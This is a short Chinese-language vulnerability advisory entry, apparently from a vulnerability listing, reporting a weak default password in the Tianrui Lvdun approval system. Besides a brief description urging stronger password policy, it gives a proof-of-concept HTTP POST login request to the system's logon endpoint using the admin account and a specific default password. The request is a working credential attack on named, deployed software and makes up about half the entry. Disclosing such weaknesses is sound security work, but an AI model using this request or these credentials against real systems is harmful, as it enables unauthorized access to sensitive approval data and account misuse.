天锐绿盾审批系统存在弱口令

日期: 2025-08-11 | 影响软件: 天锐绿盾审批系统 | POC: 已公开

漏洞描述

天锐绿盾审批系统存在弱口令漏洞,部分默认或简单密码,攻击者可利用此类凭证直接登录系统,获取敏感审批数据或越权操作,需立即强制密码策略并排查账户安全。

PoC代码

POST /trwfe/user/logon.do HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

j_language=zh-CN&lastName=admin&password=Admin@2006&randomCode=

相关漏洞推荐